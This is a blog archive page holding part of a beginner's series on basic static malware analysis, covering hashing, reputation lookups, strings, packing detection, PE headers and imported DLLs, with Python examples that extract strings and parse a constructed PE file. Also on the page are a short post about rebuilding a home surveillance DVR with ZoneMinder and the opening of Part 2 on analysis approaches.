A fundamental problem of communication (and language in general) is naming an object in order to identify it. Individual samples are identified by cryptographic hashing. The basic definition of a hash is: "an algorithm that takes an arbitrary block of data and returns a fixed-size bit string, the (cryptographic) hash value, such that any (accidental or intentional) change to the data will (with very high probability) change the hash value. The data to be encoded are often called the "message," and the hash value is sometimes called the message digest or simply digest."[<a href="https://en.wikipedia.org/wiki/Cryptographic_hash">source</a>] Typically one of two (sometimes both) algorithms is used: MD5 (Message-Digest Algorithm 5) or SHA-1 (Secure Hash Algorithm 1). Because of MD5's known collision weaknesses, many organizations have switched to SHA-1; SHA-1 has since been shown to be collision-prone as well, so SHA-256 is the better choice when you get to pick, but MD5 and SHA-1 remain the identifiers that most malware repositories and reports index on, so you will keep seeing and needing them. Generating a hash for any file is simple and there are numerous methods available across operating systems, for example:<br />
<br />
1) *Nix CLI tools "md5sum", "sha1sum" or "sha256sum": simply provide a filename and the tool outputs the hash for the algorithm of your choosing.<br />
<br />
2) Windows CLI tool "md5deep" (includes functionality for SHA-1, SHA-256 and others). Similar functionality to the *nix tools. Available <a href="http://md5deep.sourceforge.net/">here</a>.<br />
<br />
<u>Reputational Analysis:</u><br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinH2V3wwqlQcYI2dMGkoslfmHXXq38PxsIPb1PHwyEG_jBy6r7FmYV1scUh2F3LgvfOzNvaiweJBuVSTZZQ_xOJMdSEhWMZOkP9wfLVkHlhLgwJ86UX2xxKg9ewcF0eolXo_Zz579Z2O56/s1600/Slide14.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinH2V3wwqlQcYI2dMGkoslfmHXXq38PxsIPb1PHwyEG_jBy6r7FmYV1scUh2F3LgvfOzNvaiweJBuVSTZZQ_xOJMdSEhWMZOkP9wfLVkHlhLgwJ86UX2xxKg9ewcF0eolXo_Zz579Z2O56/s320/Slide14.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://www.searchenginepeople.com/wp-content/uploads/2011/01/reputation.jpg">Image Source</a></td></tr>
</tbody></table>
<u><br /></u>
When researching a sample, one of the simplest paths to an answer is to simply search for one on the internet. It is entirely possible that you are not the first person to question the integrity of "butts.jpg.exe". The fundamental follow-up to "I don't know" should generally be "I'll <a href="http://encrypted.google.com/">Google</a> it." Use the information you have already gleaned from initial static analysis to construct an intelligent query (a cryptographic hash is likely to give better results than the file name of a sample). Google the hash; Google the source if you have that information. The remainder of the tools on this list concern the reputation of the source itself (the domain or IP the sample came from), which is generally a very good indicator of the nature of the sample. As always, the rule of thumb is to use more than one tool to gather information. The exception is factual information such as associated IPs and Whois records, which isn't likely to differ between reporting sites.<br />
<br />
Sites Listed on the Slide:<br />
<a href="http://malc0de.com/">malc0de.com</a><br />
<a href="http://malwaredomains.com/">malwaredomains.com</a><br />
<a href="http://malwaredomainlist.com/">malwaredomainlist.com</a><br />
<a href="http://ipvoid.com/">ipvoid.com</a><br />
<a href="http://urlvoid.com/">urlvoid.com</a><br />
<a href="http://mywot.com/">mywot.com</a><br />
<a href="http://robtex.com/">robtex.com</a><br />
<a href="http://encrypted.google.com/">encrypted.google.com</a><br />
<br />
<u>Strings:</u><br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpYhca8NFAfF0M29KzIL43x5_RLTOVsTwM1KepcW_6AL8ohF2kwQFJshjlhQ-crHHYK7BjfoTG27-cEa8yVG8lPy7TGztFoTCSm7xhz4CuFtauT3dXfAPmWqKD93TV7gXElXFIDy40bnI4/s1600/Slide15.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpYhca8NFAfF0M29KzIL43x5_RLTOVsTwM1KepcW_6AL8ohF2kwQFJshjlhQ-crHHYK7BjfoTG27-cEa8yVG8lPy7TGztFoTCSm7xhz4CuFtauT3dXfAPmWqKD93TV7gXElXFIDy40bnI4/s320/Slide15.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://www.xxcoder.net/wordpress/wp-content/uploads/2011/03/string_code_contains_dragons.png">Image Source</a></td></tr>
</tbody></table>
<u></u><br /><u></u>
<br />
A string, for these tools, is a run of printable characters of some minimum length; the default is 3 for Sysinternals Strings and 4 for GNU strings, adjustable with -n. Searching the strings of a program is a simple but powerful way to get a first look at its functionality: function imports and API calls, hardcoded URLs, file paths and registry keys are often exposed by a single search. On Linux this is the (you guessed it) "strings" command; for Windows, the free Sysinternals "Strings" program provides nearly identical functionality. Both tools search for ASCII and "Unicode" (UTF-16LE) strings within an executable. The difference is in how the characters are stored: an ASCII string is a run of single-byte characters ("B A D") capped off by a NULL byte, whereas in UTF-16LE each character occupies two bytes, so for the Latin characters found in most binaries every letter is followed by a NULL byte, and the whole string ends with a two-byte NULL.<br />
Extracting strings ignores context, so an interesting-looking function name or value may turn out to be irrelevant (a dead code path, or a decoy). Conversely, a run of printable bytes isn't necessarily a string at all; sometimes the bytes that strings mistakes for characters are a memory address or an instruction. Fortunately, such erroneous strings are usually easy to spot.<br />
The most interesting strings, at least for our purposes, are Windows function names. They are all similarly formatted: they begin with a capital letter, contain no spaces, each subsequent word starts with a capital letter (CreateFile, RegSetValueEx), and many carry an A or W suffix for the ANSI or wide-character version (LoadLibraryA, LoadLibraryW).<br />
They are very easy to identify and extremely well documented on MSDN (Google search galore!).<br />
Common examples include:<br />
LoadLibrary - Loads a DLL into the process that may NOT have been loaded when the program started. Common to nearly every Win32 program.<br />
GetProcAddress - Retrieves the address of an exported function in a DLL already loaded in memory. Together with LoadLibrary it lets a program resolve functions at runtime without listing them in its import table, which is why a packed sample often imports little else; the same pair is also used to find code to patch or a location to inject into.<br />
<br />
<u><br /></u>
<u><br /></u>
<u>Packed vs. Unpacked (at a glance):</u><br />
<u><br /></u>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjmAzZv20q_qtfdDsMNfpvOAp2TYoLlu2X6JyFsA61lyfGEcK1QKu-gKVDEv0YbCZvwHCUSh7sC9TduecXUZkFcTm80h9SvHGWesxKw0cKcXViSXZNvdRZjVRX186TzqSJlZ52kIEovjUK/s1600/Slide16.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjmAzZv20q_qtfdDsMNfpvOAp2TYoLlu2X6JyFsA61lyfGEcK1QKu-gKVDEv0YbCZvwHCUSh7sC9TduecXUZkFcTm80h9SvHGWesxKw0cKcXViSXZNvdRZjVRX186TzqSJlZ52kIEovjUK/s320/Slide16.PNG" width="320" /></a></div>
Packing is a technique used by malware authors specifically to make analysis more difficult (it also hinders signature-based detection somewhat). Packing is a subset of obfuscation and, in general, a major hindrance to static analysis. Fortunately, the fact that a file is packed is itself a good reason to be suspicious, even though some legitimate software is packed too. Legitimate executables generally contain a large number of strings; if a program is packed, the number of meaningful strings will be fairly low, which is what you'd expect since you are only seeing the strings of the unpacking stub plus whatever junk the compressed payload happens to produce. Packed executables will need more advanced techniques to be fully<br />
<br />
An in-depth discussion of Packers can be found <a href="http://bandwidthco.com/whitepapers/compforensics/malware/virus-worms/Classification%20of%20Packed%20Executables%20for%20Accurate%20Computer%20Virus%20Detection.pdf">here</a> (warning, PDF).<br />
For an example of a packer, albeit one used by legitimate authors as well, here is <a href="http://upx.sourceforge.net/">UPX</a> (Link goes to sourceforge).<br />
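The two observations above (ASCII versus UTF-16LE storage, and the thin, junk-heavy strings output of a packed file) as an added example, not code from the original post or from either strings tool. It is a small strings(1) work-alike plus two at-a-glance heuristics that go a little beyond the text: a filter for Windows-API-shaped names, and a byte-entropy measure, which is the usual companion to the low-string-count observation because compressed or encrypted payloads have a nearly flat byte histogram. The UNPACKED and PACKED blobs, the strings in them and the 7.0 entropy threshold are constructed for illustration.<br />
<br />
```python
"""strings(1) work-alike with ASCII and UTF-16LE support, plus two packing heuristics.

Constructed example: the UNPACKED and PACKED blobs are made up to show what the
tool reports for a binary with readable imports versus one whose payload is
compressed or encrypted.
"""
import math
import re

MIN_LEN = 4                                  # GNU strings default; Sysinternals Strings uses 3
ASCII_RE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
# UTF-16LE ("Unicode") run: every printable byte is followed by a NUL high byte
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)


def extract_strings(data):
    """Return (offset, kind, text) for every ASCII and UTF-16LE run, in file order."""
    found = [(m.start(), "ascii", m.group().decode("ascii")) for m in ASCII_RE.finditer(data)]
    found += [(m.start(), "utf16", m.group().decode("utf-16-le")) for m in UTF16_RE.finditer(data)]
    return sorted(found)


def api_like_name(s):
    """Shaped like a Win32 export: leading capital, CamelCase, alphanumeric only.
    The A/W suffix is just another capital, so it needs no special case."""
    return (len(s) >= 4 and s.isascii() and s.isalnum() and s[0].isupper()
            and any(c.islower() for c in s) and sum(c.isupper() for c in s) >= 2)


def api_like(strings):
    """Filter extracted strings down to probable Windows API names, deduplicated."""
    return sorted({text for _, _, text in strings if api_like_name(text)})


def shannon_entropy(data):
    """Bits per byte, 0.0 to 8.0; compressed or encrypted data sits close to 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_packed(data, entropy_threshold=7.0):
    """At-a-glance heuristic only: high entropy plus no meaningful strings (API or DLL
    names) is what a packed sample typically looks like. Confirm by other means."""
    meaningful = [t for _, _, t in extract_strings(data)
                  if api_like_name(t) or t.lower().endswith(".dll")]
    return shannon_entropy(data) > entropy_threshold and not meaningful


# Constructed stand-in for an unpacked binary's read-only data
UNPACKED = (b"\0" * 16 + b"kernel32.dll\0LoadLibraryA\0GetProcAddress\0URLDownloadToFileA\0\0"
            + "http://example.invalid/x".encode("utf-16-le") + b"\0\0"
            + b"\x7fEL" + b"\0" * 32)                    # short junk, below MIN_LEN
# Constructed stand-in for a packed section: a flat byte histogram (maximal entropy)
PACKED = bytes(range(256)) * 16

if __name__ == "__main__":
    for blob, label in ((UNPACKED, "unpacked"), (PACKED, "packed")):
        s = extract_strings(blob)
        print(label, len(s), "strings,", api_like(s), "entropy %.2f" % shannon_entropy(blob),
              "packed?", looks_packed(blob))
```
<br />
Note that the packed stand-in still yields sixteen "strings" (the printable byte range repeated), none of which is an API or DLL name; that is the junk-without-meaning pattern the paragraph above describes, and why counting strings alone is a weaker signal than counting strings you can name.<br />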
<br />
<u>PE Headers:</u><br />
<u><br /></u>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAiK7QKAKxpXaqGuNGMk44sNDcXa3OT5AK9H6J_vwzPwqDYeRGtDUV_eULrzhZUKGBGVeawtu5z8wX3jL-hjLFWhbLiJN3nZ5ofhv5LG_d3U7yBkhegfVud6EMlgQyXtdXRmPWYNhzaufC/s1600/Slide17.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAiK7QKAKxpXaqGuNGMk44sNDcXa3OT5AK9H6J_vwzPwqDYeRGtDUV_eULrzhZUKGBGVeawtu5z8wX3jL-hjLFWhbLiJN3nZ5ofhv5LG_d3U7yBkhegfVud6EMlgQyXtdXRmPWYNhzaufC/s320/Slide17.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image Source: <span style="font-size: x-small;">hexdump -C &lt;file&gt; | head</span></td><td class="tr-caption"><span style="font-size: x-small;"><br /></span></td></tr>
</tbody></table>
<br />
For static analysis, the PE file headers are a treasure trove of information. Besides locating the imports and exports, the headers contain the compile time stamp (set by the linker, and trivially forged or zeroed by the author), file metadata such as the target machine and subsystem, and the section table describing the various sections:<br />
<br />
<ol style="text-align: left;">
<li>.text - the instructions the CPU executes</li>
<li>.rdata - read-only data; the import and export tables usually live here (or in their own .idata/.edata sections)</li>
<li>.data - global data (accessible from any part of the program)</li>
<li>.rsrc - resources used by the executable that are not part of its code or data: icons, images, menus, and string tables are commonly located here</li>
</ol>
<br />
This isn't an all inclusive list, but a snapshot of the interesting sections. These sections are what provide the majority of the information displayed by tools like <a href="http://www.dependencywalker.com/">Dependency Walker</a> and <a href="http://wjradburn.com/software/">PEview</a>. This information is of the utmost importance when trying to assemble an overall contextual view and opinion of the file being analyzed.<br />
<u><br /></u>
<u>Linked Libraries and Functions:</u><br />
<u><br /></u>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAV2ksR9dXRGATq0asEaIHYQDHOHgBhURSW0mWU7oVUUDqFwzW5EZZ8JVFdJfE1yJ8LyJBnqHR1QcoN27sBec2zIMcm0W1e7dOKTmRZNwfDRkELlu8zkcFeKOSikW6pQuX2raSd6ftueS2/s1600/Slide18.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAV2ksR9dXRGATq0asEaIHYQDHOHgBhURSW0mWU7oVUUDqFwzW5EZZ8JVFdJfE1yJ8LyJBnqHR1QcoN27sBec2zIMcm0W1e7dOKTmRZNwfDRkELlu8zkcFeKOSikW6pQuX2raSd6ftueS2/s320/Slide18.PNG" width="320" /></a></div>
Imported functions are the key to basic static analysis; they are the backbone on which analysts make informed decisions about an executable. An import is a function that one program uses but that is actually stored in another module, typically a DLL (CreateFile, for example, lives in kernel32.dll); the connection between the two is called linking. There are three primary ways in which libraries can be linked:<br />
<br />
<ol style="text-align: left;">
<li>Static - The library's code is copied into the executable at build time, so nothing shows up in the import table. Common in Unix programs, rare in Windows malware.</li>
<li>Runtime - Commonly used by packed or obfuscated malware; functions are resolved "ad hoc" while the program runs, through LoadLibrary and GetProcAddress, so they never appear in the import table.</li>
<li>Dynamic - Libraries are loaded by the Windows loader when the program starts, from the list in the executable's import table. (Most common, and the kind static analysis sees.)</li>
</ol>
<br />
Identifying the libraries used is useful for hypothesizing what a program is meant to do. For example, imports from Shell32.dll can indicate that a file launches other programs; that is not malicious on its own, but it does give us reason to be suspicious. Tools like the previously referenced <a href="http://www.dependencywalker.com/">DependencyWalker</a> are extremely useful in exploring the capabilities of an executable.<br />
<br />
Below is a list of common DLLs and their functionality. This list was constructed by the authors of "<a href="http://nostarch.com/malware">Practical Malware Analysis</a>" (Sikorski & Honig, 2012, Page 17).<br />
<table border="1" cellpadding="4" cellspacing="0" style="border-collapse: collapse;">
<tbody>
<tr><td><b>DLL</b></td><td><b>Description</b></td></tr>
<tr><td>Kernel32.dll</td><td>This is a very common DLL that contains core functionality, such as access and manipulation of memory, files, and hardware.</td></tr>
<tr><td>Advapi32.dll</td><td>This DLL provides access to advanced core Windows components such as the Service Manager and Registry.</td></tr>
<tr><td>User32.dll</td><td>This DLL contains all the user-interface components, such as buttons, scroll bars, and components for controlling and responding to user actions.</td></tr>
<tr><td>Gdi32.dll</td><td>This DLL contains functions for displaying and manipulating graphics.</td></tr>
<tr><td>Ntdll.dll</td><td>This DLL is the interface to the Windows kernel. Programs generally do not import this file directly, although it is always imported indirectly by Kernel32.dll. If an executable imports this file, it means that the author intended to use functionality not normally available to Windows programs. Some tasks, such as hiding functionality or manipulating processes, will use this interface.</td></tr>
<tr><td>WSock32.dll and Ws2_32.dll</td><td>These are networking DLLs. A program that accesses either of these most likely connects to a network or performs network-related tasks.</td></tr>
<tr><td>Wininet.dll</td><td>This DLL contains higher-level networking functions that implement protocols such as FTP, HTTP, and NTP.</td></tr>
</tbody></table>
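<br />
As an added example covering the Hashing, PE Headers and Linked Libraries sections (this is not code from the post, PEview, or Dependency Walker), the following builds a constructed, minimal PE32 with a genuine import directory and then parses it back with nothing but the standard library: the digests analysts exchange, the COFF header fields, the section table, and the imported DLLs and functions, mapped to the capability hints from the table above. The sample's sections, imported names and time stamp are invented; the header layouts and data-directory offsets are the real PE32 ones, so the parser should also work on a typical 32-bit executable read from disk (it handles import-by-ordinal and linkers that leave the lookup table empty, but not bound or delay-load imports).<br />
<br />
```python
"""Minimal PE32 parser exercised on a constructed sample (added example, not the post's code).
build_sample_pe() emits a tiny, non-runnable PE32 with .text/.rdata sections and a real
import directory; parse_pe() reads back what PEview or Dependency Walker would show."""
import hashlib
import struct

SECTION = struct.Struct("<8sIIIIIIHHI")       # IMAGE_SECTION_HEADER
DESCRIPTOR = struct.Struct("<IIIII")          # IMAGE_IMPORT_DESCRIPTOR
OPTIONAL = struct.Struct("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6)  # PE32, without data directories
DLL_HINTS = {                                 # condensed from the table above
    "kernel32.dll": "core: memory, files, hardware", "advapi32.dll": "service manager, registry",
    "user32.dll": "user interface", "gdi32.dll": "graphics", "ntdll.dll": "kernel interface (unusual)",
    "wsock32.dll": "networking (Winsock)", "ws2_32.dll": "networking (Winsock)",
    "wininet.dll": "higher-level networking (HTTP, FTP)",
}

def build_sample_pe():
    """Constructed PE32 importing LoadLibraryA/GetProcAddress and InternetOpenA; all values invented."""
    rdata, rdata_rva = bytearray(), 0x2000

    def place(blob, align):                   # append to .rdata at the given alignment, return its RVA
        rdata.extend(b"\0" * (-len(rdata) % align))
        rdata.extend(blob)
        return rdata_rva + len(rdata) - len(blob)

    wanted = {b"kernel32.dll": [b"LoadLibraryA", b"GetProcAddress"], b"wininet.dll": [b"InternetOpenA"]}
    descriptors = b""
    for dll, funcs in wanted.items():
        name_rva = place(dll + b"\0", 2)
        # IMAGE_IMPORT_BY_NAME: 2-byte hint then NUL-terminated name; the thunk array ends with a zero
        thunks = b"".join(struct.pack("<I", place(b"\0\0" + f + b"\0", 2)) for f in funcs) + b"\0" * 4
        ilt, iat = place(thunks, 4), place(thunks, 4)   # lookup table, and the address table the loader fills
        descriptors += DESCRIPTOR.pack(ilt, 0, 0, name_rva, iat)
    descriptors += b"\0" * DESCRIPTOR.size             # all-zero descriptor ends the list
    import_rva = place(descriptors, 4)
    rdata.extend(b"\0" * (0x200 - len(rdata)))
    dirs = [(0, 0)] * 16
    dirs[1] = (import_rva, len(descriptors))           # IMAGE_DIRECTORY_ENTRY_IMPORT
    optional = OPTIONAL.pack(0x10B, 9, 0, 0x200, 0x200, 0, 0x1000, 0x1000, 0x2000, 0x400000,  # magic .. ImageBase
                             0x1000, 0x200, 4, 0, 0, 0, 4, 0, 0, 0x3000, 0x200, 0, 2, 0,        # alignments .. subsystem
                             0x100000, 0x1000, 0x100000, 0x1000, 0, 16)                         # stack/heap, 16 dirs
    optional += b"".join(struct.pack("<II", *d) for d in dirs)
    headers = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                                  # e_lfanew = 0x40
               + b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0x5128E6B0, 0, 0, len(optional), 0x102)
               + optional
               + SECTION.pack(b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
               + SECTION.pack(b".rdata", 0x200, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0x40000040))
    return headers.ljust(0x200, b"\0") + b"\xcc" * 0x200 + bytes(rdata)   # int3 filler stands in for code

def _cstring(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii")

def parse_pe(data):
    """Parse DOS/COFF/optional headers, the section table and the import directory."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    import_rva = struct.unpack_from("<I", data, opt + 96 + 8)[0]          # data directory entry 1
    sections = [SECTION.unpack_from(data, opt + opt_size + i * SECTION.size) for i in range(nsec)]

    def to_offset(rva):                       # RVA -> file offset via the section table
        for _, vsize, va, rawsize, raw, *_ in sections:
            if va <= rva < va + max(vsize, rawsize):
                return rva - va + raw
        raise ValueError("RVA 0x%x is not backed by any section" % rva)

    imports, off = {}, to_offset(import_rva)
    while True:
        ilt, _, _, name_rva, iat = DESCRIPTOR.unpack_from(data, off)
        if name_rva == 0:
            break
        funcs = []
        for toff in range(to_offset(ilt or iat), len(data), 4):   # some linkers leave the ILT empty
            thunk = struct.unpack_from("<I", data, toff)[0]
            if not thunk:
                break
            funcs.append("#%d" % (thunk & 0xFFFF) if thunk & 0x80000000   # import by ordinal
                         else _cstring(data, to_offset(thunk) + 2))        # skip the 2-byte hint
        imports[_cstring(data, to_offset(name_rva)).lower()] = funcs
        off += DESCRIPTOR.size
    return {"machine": machine, "timestamp": stamp, "entry_point": entry,
            "sections": [(n.rstrip(b"\0").decode(), va, vsize, raw, rawsize)
                         for n, vsize, va, rawsize, raw, *_ in sections],
            "imports": imports}

def hashes(data):
    """The identifiers analysts exchange; changing any byte changes every digest."""
    return {a: hashlib.new(a, data).hexdigest() for a in ("md5", "sha1", "sha256")}

def capability_hints(info):
    """Map imported DLLs to the rough capabilities in the table above."""
    return {dll: DLL_HINTS.get(dll, "unknown, look it up") for dll in info["imports"]}
```
<br />
To use it on a real file, replace build_sample_pe() with the bytes read from disk and print hashes(), parse_pe() and capability_hints(). The one design choice worth noting is the RVA-to-file-offset translation through the section table: the import directory and every name it points at are expressed as virtual addresses, which is exactly the mapping a memory dump no longer needs (the image is already laid out by RVA) and an on-disk file always does.<br />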
<br />
<u>References:</u><br />
<br />
Here is a dump of all the references I have not mentioned or linked to specifically (no particular order):<br />
<br />
<br />
<ul style="text-align: left;">
<li>Practical Malware Analysis – Michael Sikorski and Andrew Honig (No Starch Press)</li>
<li>Kahu Security – http://www.kahusecurity.com/</li>
<li>Malware Analyst’s Cookbook – Michael Ligh, Steven Adair, Blake Hartstein, Matthew Richard</li>
<li>REMnux – Lenny Zeltser’s R(everse) E(ngineering) M(alware) distro (zeltser.com/remnux)</li>
</ul>
<div>
Hopefully they help you as much as they helped me.</div>
<div>
<br /></div>
<div>
I hope you enjoyed this series. Check back for more stuff soon!</div>
</div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-67816641193874316772013-02-17T08:14:00.001-08:002013-02-17T08:14:06.071-08:00An unexpected weekend project that went very well.We all have these unexpected projects. This week I was given a surveillance DVR that had seen better days. The primary hard disk had spun a bearing (hehe). It was a system I built a number of years ago for my family. Previously I used the software that came with the capture card, a generic 4 channel bt878 card. The software ran on Windows XP so from the start I never really expected anything long lasting although it did last about 5 years.<br />
<br />
Anyways, enough about what it was. I dug up a 4Gb USB flash drive, installed a very basic CentOS 6 install, got x264, FFmpeg, ZoneMinder, MySQL, PHP and Apache and made it a reliable surveillance server now. It does have a 1Tb drive for the video.<br />
<br />
I have to say the ZoneMinder software is not anything fancy by first appearance but supports all the features that most expensive commercial solutions offer. I like that it did not require me to install any GUI environment on the device itself. No resources wasted on this build.<br />
<br />
<br />
<span style="font-size: x-small;">[root@cam ~]# uptime</span><br />
<span style="font-size: x-small;"> 11:09:56 up 1 day, 23:04, 2 users, load average: 0.00, 0.18, 0.22</span><br />
<span style="font-size: x-small;">[root@cam ~]# ps ax | grep zm[ac]</span><br />
<span style="font-size: x-small;">12795 ? S 0:04 /usr/bin/perl -wT /usr/local/bin/zmaudit.pl -c</span><br />
<span style="font-size: x-small;">12931 ? S 46:47 /usr/local/bin/zmc -d /dev/video0</span><br />
<span style="font-size: x-small;">16011 ? S 131:08 /usr/local/bin/zma -m 5</span><br />
<span style="font-size: x-small;">16192 ? S 35:39 /usr/local/bin/zmc -d /dev/video1</span><br />
<span style="font-size: x-small;">16204 ? S 126:37 /usr/local/bin/zma -m 6</span><br />
<span style="font-size: x-small;">16231 ? S 35:32 /usr/local/bin/zmc -d /dev/video2</span><br />
<span style="font-size: x-small;">16243 ? S 120:07 /usr/local/bin/zma -m 7</span><br />
<span style="font-size: x-small;">16309 ? S 34:22 /usr/local/bin/zmc -d /dev/video3</span><br />
<span style="font-size: x-small;">16321 ? S 128:12 /usr/local/bin/zma -m 8</span><br />
<br /><br />
Not bad for an old Pentium E5200 with 2 GB.<br />
<br />
-Mathew<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-4758575888451943302013-02-10T21:42:00.001-08:002013-02-16T10:41:50.788-08:00Malware Analysis 101 [Part 2]<div dir="ltr" style="text-align: left;" trbidi="on">
Now that we've covered the classification of malicious software by functionality, made the distinction between targeting vectors, and summarized how IDS/IPS devices fit into the scheme, it's time to move on to the analysis of malware. In case you missed it, Part 1 can be found <a href="http://micrmsoft.blogspot.com/2013/02/malware-analysis-101-part-1.html">here</a>.<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBAuJAjMHarDYJAm48wQeOszxUVBuZSGzQJWlQ16wTaxX8L_DmNd9Dmv59YY8fyXbZ6CIwze2diSQcLNW-gZHIB5wjah_6yIqqANxnoNJUCe7B96tM7HilGkf7fPHi0H-B25tBXd9k3XlL/s1600/Slide8.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBAuJAjMHarDYJAm48wQeOszxUVBuZSGzQJWlQ16wTaxX8L_DmNd9Dmv59YY8fyXbZ6CIwze2diSQcLNW-gZHIB5wjah_6yIqqANxnoNJUCe7B96tM7HilGkf7fPHi0H-B25tBXd9k3XlL/s320/Slide8.PNG" height="239" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://www.blogger.com/Image%20source:%20http://img.aegen.nl/NPH/Surgical%20Extraction.jpg">Image Source</a></td></tr>
</tbody></table>
<u>Approaches:</u><br />
<u><br /></u>
Generally, analysis of any sample can be broken down into two categories, static and dynamic, each of which further subdivides into basic and advanced:<br />
<br />
<ul style="text-align: left;">
<li>Static</li>
<ul>
<li>Basic - Examine the executable without running it and without reading its instructions: hashes, strings, headers, and the libraries and functions it imports.</li>
<li>Advanced - Code analysis: disassemble the binary and read its instructions (opcodes/assembly) to work out what it does.</li>
</ul>
<li>Dynamic</li>
<ul>
<li>Basic - Behavioral observation [Sandboxing].</li>
<li>Advanced - Code analysis using a debugger to manually control the flow of the program. This technique is used to understand the more complex aspects of a sample which static code analysis may be unable to provide.</li>
</ul>
</ul>
<div>
Each of the above techniques can be used in combination with the others to reveal different pieces of information about a piece of software. The goal of analysis is to take these many small pieces of information from multiple sources and form a picture of the nature of the sample.</div>
<div>
<br /></div>
<div>
<u>Basic Static Analysis:</u></div>
<div>
<u><br /></u></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh00_lJ05TmLS2FWnLKSyXpoFImkToX8nTMYGRCDRhnjk6P6hr7qZW5VnPiOtPVQPjl8FnFF2l3w4AdqGNIcNRMhfY1qevqBxFduFFnAy7Mv8VhNUaZ0XNYnPQx3SbwLk456Lcvfp72Fxkm/s1600/Slide9.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh00_lJ05TmLS2FWnLKSyXpoFImkToX8nTMYGRCDRhnjk6P6hr7qZW5VnPiOtPVQPjl8FnFF2l3w4AdqGNIcNRMhfY1qevqBxFduFFnAy7Mv8VhNUaZ0XNYnPQx3SbwLk456Lcvfp72Fxkm/s320/Slide9.PNG" height="238" width="320" /></a></div>
<div>
From here on, it is assumed that a sample is readily apparent and available. Finding malware is a whole different can of worms, and a worthy topic for a separate blog post series (maybe in the future). </div>
<div>
<br /></div>
<div>
With a sample in hand, one of the first things that can be done is antivirus scanning. The key is to use multiple products and resources, as this increases signature coverage: differences between vendors' signatures make a substantial difference in the rate of detection. Fortunately, instead of buying 8-10 host-based antivirus products (and pitting them against each other on the same local machine) along with their accompanying subscriptions, several free web services exist which will scan a submitted sample against multiple antivirus engines. These engines include both signature-based and heuristic detection. The most common/popular/well-known example is, of course, <a href="http://virustotal.com/">VirusTotal.com</a> (which offers registration-free submission, a public API, and a private API).</div>
<div>
<br /></div>
<div>
Before moving on, a word about the inherent weaknesses of antivirus software. The two types of detection mechanisms, signature-based and heuristic, each have shortcomings. Simple code modifications (repacking, recompiling, changing strings) easily bypass signature-based detection, and in this era of malware that updates itself over its network (command and control) channel, the cat and mouse game has become even more fast paced. Heuristic engines have a related weakness: they flag code that looks or behaves like known malicious code, so genuinely new or unusual code that matches none of the engine's rules goes uncategorized.</div>
<div>
